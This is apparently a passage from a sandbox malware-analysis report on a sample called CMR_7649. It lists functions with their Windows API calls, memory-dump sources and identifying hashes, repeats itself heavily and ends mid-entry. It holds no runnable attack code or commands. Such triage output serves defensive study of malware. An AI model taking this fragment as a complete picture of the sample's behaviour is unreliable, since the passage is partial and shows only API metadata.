                                                Similarity
                                                • API ID: AllocateHeap_free_malloc
                                                • String ID: [B
                                                • API String ID: 1020059152-632041663
                                                • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                • __calloc_crt.LIBCMT ref: 00413DB0
                                                • __getptd.LIBCMT ref: 00413DBD
                                                • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                • _free.LIBCMT ref: 00413E07
                                                • __dosmaperr.LIBCMT ref: 00413E12
                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                • String ID:
                                                • API String ID: 155776804-0
                                                • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                • __freefls@4.LIBCMT ref: 00413D74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                • String ID:
                                                • API String ID: 259663610-0
                                                • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 004302E6
                                                • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                • GetClientRect.USER32(?,?), ref: 00430364
                                                • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                • GetWindowRect.USER32(?,?), ref: 004303C3
                                                • ScreenToClient.USER32(?,?), ref: 004303EC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Rect$Client$Window$MetricsScreenSystem
                                                • String ID:
                                                • API String ID: 3220332590-0
                                                • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _malloc_wcslen$_strcat_wcscpy
                                                • String ID:
                                                • API String ID: 1612042205-0
                                                • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                                                • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove_strncmp
                                                • String ID: >$U$\
                                                • API String ID: 2666721431-237099441
                                                • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 0044C570
                                                • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessagePost$KeyboardState$InputSend
                                                • String ID:
                                                • API String ID: 2221674350-0
                                                • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcscpy$_wcscat
                                                • String ID:
                                                • API String ID: 2037614760-0
                                                • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Variant$Copy$AllocClearErrorLastString
                                                • String ID:
                                                • API String ID: 960795272-0
                                                • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                Download Yara Rule
                                                APIs
                                                • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                • String ID:
                                                • API String ID: 4189319755-0
                                                • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageSend$LongWindow$InvalidateRect
                                                • String ID:
                                                • API String ID: 1976402638-0
                                                • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$Show$Enable$MessageSend
                                                • String ID:
                                                • API String ID: 642888154-0
                                                • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Variant$Copy$ClearErrorLast
                                                • String ID: NULL Pointer assignment$Not an Object type
                                                • API String ID: 2487901850-572801152
                                                • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$Enable$Show$MessageSend
                                                • String ID:
                                                • API String ID: 1871949834-0
                                                • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
